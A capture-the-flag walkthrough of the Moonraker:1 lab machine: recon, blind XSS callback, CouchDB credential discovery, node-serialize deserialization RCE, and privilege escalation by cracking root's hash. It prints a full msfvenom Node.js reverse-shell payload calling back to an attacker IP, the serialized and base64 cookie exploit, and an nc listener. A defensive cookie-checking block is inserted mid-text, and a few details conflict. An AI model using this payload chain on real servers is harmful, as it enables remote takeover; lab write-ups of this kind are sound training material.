Moonraker:1 Target Machine Compromise

 

0x01 Introduction

Attack the Moonraker system, find the most serious vulnerability it exposes, use that vulnerability to compromise the target machine, escalate privileges, and retrieve the flag stored under the root directory.

Moonraker: 1 image download address:

http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA

0x02 Information Gathering

1. Live host scan

root@kali2018:/# arp-scan -l

192.168.1.10 is found to be the target machine.

2. Port scan

Scan the target's ports with nmap:

root@kali2018:~# nmap -p- -A 192.168.1.10 --open

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST

Nmap scan report for 192.168.1.10

Host is up (0.00077s latency).

Not shown: 65529 closed ports

PORT      STATE SERVICE  VERSION

22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)

| ssh-hostkey:

|   2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)

|   256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)

|_  256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519)

80/tcp    open  http     Apache httpd 2.4.25 ((Debian))

| http-robots.txt: 1 disallowed entry

|_/

|_http-server-header: Apache/2.4.25 (Debian)

|_http-title: MOONRAKER

3000/tcp  open  http     Node.js Express framework

| http-auth:

| HTTP/1.1 401 Unauthorized\x0D

|_  Basic realm=401

|_http-title: Site doesn't have a title (text/html; charset=utf-8).

4369/tcp  open  epmd     Erlang Port Mapper Daemon

| epmd-info:

|   epmd_port: 4369

|   nodes:

|_    couchdb: 33681

5984/tcp  open  couchdb?

| fingerprint-strings:

|   FourOhFourRequest:

|     HTTP/1.0 404 Object Not Found

|     Cache-Control: must-revalidate

|     Connection: close

|     Content-Length: 58

|     Content-Type: application/json

|     Date: Mon, 11 Feb 2019 21:22:55 GMT

|     Server: CouchDB/2.2.0 (Erlang OTP/19)

|     X-Couch-Request-ID: bf092a958f

|     X-CouchDB-Body-Time: 0

|     {"error":"not_found","reason":"Database does not exist."}

|   GetRequest:

|     HTTP/1.0 200 OK

|     Cache-Control: must-revalidate

|     Connection: close

|     Content-Length: 164

|     Content-Type: application/json

|     Date: Mon, 11 Feb 2019 21:22:02 GMT

|     Server: CouchDB/2.2.0 (Erlang OTP/19)

|     X-Couch-Request-ID: f038a56575

|     X-CouchDB-Body-Time: 0

|{"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}

|   HTTPOptions:

|     HTTP/1.0 500 Internal Server Error

|     Cache-Control: must-revalidate

|     Connection: close

|     Content-Length: 61

|     Content-Type: application/json

|     Date: Mon, 11 Feb 2019 21:22:02 GMT

|     Server: CouchDB/2.2.0 (Erlang OTP/19)

|     X-Couch-Request-ID: fdeb1a3860

|     X-Couch-Stack-Hash: 1828508689

|     X-CouchDB-Body-Time: 0

|_{"error":"unknown_error","reason":"badarg","ref":1828508689}

The nmap output shows the open ports and services: 22 (ssh), 80 (http), 110 (pop3), 3000 (node.js), 4369 (epmd), 5984 (couchdb).

3. Directory scan

I prefer gobuster and DirBuster for directory scanning; here I use gobuster against the target.

After the scan completes, a suspicious directory /services is found.

Open that directory at http://192.168.1.10/services/; at the bottom of the page there is a "SEND AN INQUIRY" hyperlink. Open it.

The link leads to an after-sales contact page. Note that someone will review the information we submit and contact us within 5 minutes.

Here we embed the address of our own remote web server in an <img> tag. (As soon as the other side views the page carrying this blind XSS payload, the access request is recorded in the remote server's log.)

Starting Apache

Before submitting the form, start the Apache service and create a test file test.txt under /var/www/html with any content.

root@kali2018:~# /etc/init.d/apache2 start

[ ok ] Starting apache2 (via systemctl): apache2.service.

root@kali2018:~# cd /var/www

root@kali2018:/var/www# ls

html

root@kali2018:/var/www# cd html/

root@kali2018:/var/www/html# ls

index.html  index.nginx-debian.html

root@kali2018:/var/www/html# vi  test.txt

root@kali2018:/var/www/html#

Verify that the Apache server can be reached normally.

Afterwards the target's visit can be seen in apache2's access.log. After clicking submit, the site shows a "thanks for your submission" message, as shown in the figure below.

Check the Apache access log with:

tail -f /var/log/apache2/access.log

The log contains an interesting HTTP Referer address: http://192.168.1.10/svc-inq/salesmoon-gui.php

0x03 Exploitation

1. CouchDB information gathering

We open the HTTP Referer address in a browser.

A "back to sales admin" hyperlink is displayed; clicking it leads to the sales admin login page.

Next we click CouchDB Notes and get a hint about the username and password:

Username: jaws, password: the name of Jaws' girlfriend + x99

Here we Google "Jaws' girlfriend".

 

We now have the Apache CouchDB username and password for the Fauxton interface. To learn more about Fauxton and CouchDB, Google their usage (http://docs.couchdb.org/en/stable/fauxton/install.html).

2. CouchDB login and information disclosure

Since port 5984 is open, the CouchDB login page can be opened (192.168.1.10:5984/_utils/).

Here we use the following login credentials:

Username: jaws

Password: dollyx99

 

Login succeeded; now let's look at the information in the 3 databases.

The links database exposes more information.

Look at the documents in the links database: each document contains a directory link, and the third one may provide useful information for the next step of the penetration.

So we open the link in the third document and find a useful directory link.

The link above, once opened, shows an HR office memo (it records several people's important email messages).

Usernames and passwords are leaked in the emails.

3. Node.js deserialization

Open the admin page http://192.168.1.10/raker-sales/; the page "hugo's page moved to port 3k" is interesting (in combination with hugo's email in the HR memo above).

Opening that link shows information about the node.js server and how to access it.

 

 

The username and password are in Hugo's HR email: http://192.168.1.10/HR-Confidential/offer-letters.html

It shows the username and password for logging in to node.js (accessed via port 3000).

 

After login, the node.js server sends a "Set-Cookie" header.


Information on the Node.js deserialization vulnerability can be found at the linked address.

4. Exploiting the deserialization vulnerability

From the nmap output we know that port 3000 runs a Node.js framework application. So we open port 3000 of the target IP in the browser and a login prompt appears.

Username: hugo

Password: TempleLasersL2K

After logging in, a message is shown on the page. The page seems useless, but after taking time to figure out the next step it becomes very interesting.

Open the F12 developer tools to inspect the page's request. There is base64-encoded data in the cookie. This is where we insert the node.js deserialization payload, in base64-encoded form.

 

Generate a nodejs reverse shell with msfvenom:

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.21 LPORT=1234

Save the msfvenom terminal output as rce.js:

rce.js

var rev = {

rce: function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, "192.168.1.21", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }

};

var serialize = require('node-serialize');

console.log(serialize.serialize(rev));

 

Run node rce.js to get the serialized string output.

root@kali2018:/opt# node  rce.js

{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }"}

Next, append the IIFE parentheses () to the end of the serialized string from the previous step:

{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }()"}

Then base64-encode it:

eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL153aW4vaSkpID8gXCJjbWRcIiA6IFwiL2Jpbi9zaFwiOyB2YXIgbmV0ID0gcmVxdWlyZShcIm5ldFwiKSwgY3AgPSByZXF1aXJlKFwiY2hpbGRfcHJvY2Vzc1wiKSwgdXRpbCA9IHJlcXVpcmUoXCJ1dGlsXCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCgxMjM0LCBcIjE5Mi4xNjguMS4yMVwiLCBmdW5jdGlvbigpIHsgY2xpZW50LnNvY2tldC5waXBlKHNoLnN0ZGluKTsgaWYgKHR5cGVvZiB1dGlsLnB1bXAgPT09IFwidW5kZWZpbmVkXCIpIHsgc2guc3Rkb3V0LnBpcGUoY2xpZW50LnNvY2tldCk7IHNoLnN0ZGVyci5waXBlKGNsaWVudC5zb2NrZXQpOyB9IGVsc2UgeyB1dGlsLnB1bXAoc2guc3Rkb3V0LCBjbGllbnQuc29ja2V0KTsgdXRpbC5wdW1wKHNoLnN0ZGVyciwgY2xpZW50LnNvY2tldCk7IH0gfSk7IHNvY2tldC5vbihcImVycm9yXCIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSgpIn0=

 

First log in to the node.js backend, then refresh the page and intercept the request with Burp Suite; set the whole base64 string as the value of the profile cookie and forward the modified request. Before doing this you need to set up your nc listener.

Now we listen with netcat on the attack machine, and once the shell connects we upgrade it to an interactive shell with a python one-liner: python -c 'import pty; pty.spawn("/bin/bash")'

root@kali2018:/opt# nc -lvvp 1234

listening on [any] 1234 ...

192.168.1.10: inverse host lookup failed: Unknown host

connect to [192.168.1.21] from (UNKNOWN) [192.168.1.10] 46010

id

uid=1001(jaws) gid=1001(jaws) groups=1001(jaws)

python -c "import pty;pty.spawn('/bin/bash')"

jaws@moonraker:/$
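The step above works because node-serialize's unserialize() evaluates any string prefixed with its function marker. As an added example (not code from the original write-up or from the target application), this is how the profile cookie should be handled on the server side so that tampering is detected and rejected; the profile field names are assumptions.

```javascript
// Added example (not from the original write-up): defensive handling of the
// base64 "profile" cookie the walkthrough tampers with. node-serialize marks
// serialized functions with the prefix "_$$ND_FUNC$$_" and unserialize()
// evals them, so a cookie carrying that marker plus a trailing "()" runs
// attacker-supplied code on the server. Field names below are assumptions.
const FUNC_MARKER = '_$$ND_FUNC$$_';
const ALLOWED_FIELDS = ['username', 'country', 'city'];

// Decode and validate one cookie value without ever calling a deserializer
// that can execute code. Returns { ok: true, profile } or { ok: false, reason }.
function parseProfileCookie(cookieValue) {
  if (typeof cookieValue !== 'string' || !/^[A-Za-z0-9+/]*={0,2}$/.test(cookieValue)) {
    return { ok: false, reason: 'cookie is not base64' };
  }
  const decoded = Buffer.from(cookieValue, 'base64').toString('utf8');
  // Detection first: the marker is never legitimate in user-controlled input,
  // so its presence is worth logging as a tampering attempt.
  if (decoded.includes(FUNC_MARKER)) {
    return { ok: false, reason: 'serialized function marker in cookie' };
  }
  let obj;
  try {
    obj = JSON.parse(decoded); // JSON.parse only parses data; it never evals
  } catch (e) {
    return { ok: false, reason: 'cookie is not valid JSON' };
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'cookie is not an object' };
  }
  // Allow-list: copy only the expected string fields and drop everything else.
  const profile = {};
  for (const key of ALLOWED_FIELDS) {
    if (typeof obj[key] === 'string') profile[key] = obj[key];
  }
  return { ok: true, profile };
}

// Constructed sample cookies: a normal profile, a tampered one carrying a
// harmless function marker with the IIFE "()" suffix, and non-base64 junk.
const SAMPLE_COOKIES = {
  benign: Buffer.from(JSON.stringify({ username: 'hugo', country: 'UK' })).toString('base64'),
  tampered: Buffer.from('{"rce":"_$$ND_FUNC$$_function (){ return 1 }()"}').toString('base64'),
  garbage: 'not base64 at all!',
};

// Classify every sample; a request filter or log-review script would do the
// same for each incoming profile cookie.
function classifySamples() {
  const out = {};
  for (const [name, value] of Object.entries(SAMPLE_COOKIES)) out[name] = parseProfileCookie(value);
  return out;
}

console.log(classifySamples());
```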

0x04 Privilege Escalation

While enumerating the jaws account, I noticed that Postfix is listening locally on port 25.

netstat  -ano

In /var/mail we find four mailboxes, but we have no permission to read them.

jaws@moonraker:~$ cd /var/mail

jaws@moonraker:/var/mail$ ls -al

total 96

drwxrwsr-x  2 root          mail  4096 Oct 14 10:25 .

drwxr-xr-x 12 root          root  4096 Sep 20 17:38 ..

-rw-------  1 hugo          mail  2994 Oct  6 11:47 hugo

-rw-------  1 moonrakertech mail  1478 Oct  5 19:24 moonrakertech

-rw-------  1 root          mail 68975 Oct  6 11:40 root

-rw-------  1 sales         mail  6342 Oct 14 10:25 sales

Having looked into CouchDB's configuration, we found that CouchDB's default install directory is /opt/couchdb and that its configuration is read from the local.ini file under etc.

Let's look at the configuration in local.ini:

jaws@moonraker:/var/mail$ tail /opt/couchdb/etc/local.ini

 

Username: hugo

Password: 321Blast0ff!!


With hugo's password, I log in to his account and read his mail.

jaws@moonraker:/var/mail$ su  hugo

Password: 321Blast0ff!

Mail version 8.1.2 01/15/2001.  Type ? for help.

After logging in as hugo and reading his mail, we notice that Message 2 is interesting: it contains root's password hash and also tells us that the password is used in the VROOM system as well.

jaws@moonraker:/var/mail$ mail

"/var/mail/hugo": 3 messages 3 new

>N  1 moonrakertech@moo  Fri Oct  5 19:11   17/842   RE:Root Access

 N  2 moonrakertech@moo  Fri Oct  5 19:39   23/1351  RE:RE:RE:Root Access

 N  3 hr@moonraker.loca  Fri Oct  5 20:24   17/801   Decompression Accident

&

Here we read message 2:


& 2

Message 2:

From moonrakertech@moonraker.localdomain  Fri Oct  5 19:39:51 2018

X-Original-To: hugo@moonraker.localdomain

To: hugo@moonraker.localdomain

Subject: RE:RE:RE:Root Access

MIME-Version: 1.0

Content-Type: text/plain; charset="UTF-8"

Content-Transfer-Encoding: 8bit

Date: Fri,  5 Oct 2018 19:39:51 -0400 (EDT)

From: moonrakertech@moonraker.localdomain

Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk.

Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes.

Have fun with the decryption process "Boss"! Haha!

 

root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::

This shows the root user and the hash of its old password.

Let's copy the old password hash and crack it offline with John the Ripper:

john  root.hash

Username: root

Password: cyber

The final new login password is therefore cyber + VR00M (cyberVR00M).

Log in to the system as root.


hugo@moonraker:/var/mail$ su root

Password: cyberVR00M

0x05 Viewing the flag

Logged in as root successfully; while checking root's home directory we find the flag.txt file.

root@moonraker:~# cd /root

root@moonraker:~# ls

core  Desktop  Downloads  flag.txt

root@moonraker:~# cat flag.txt

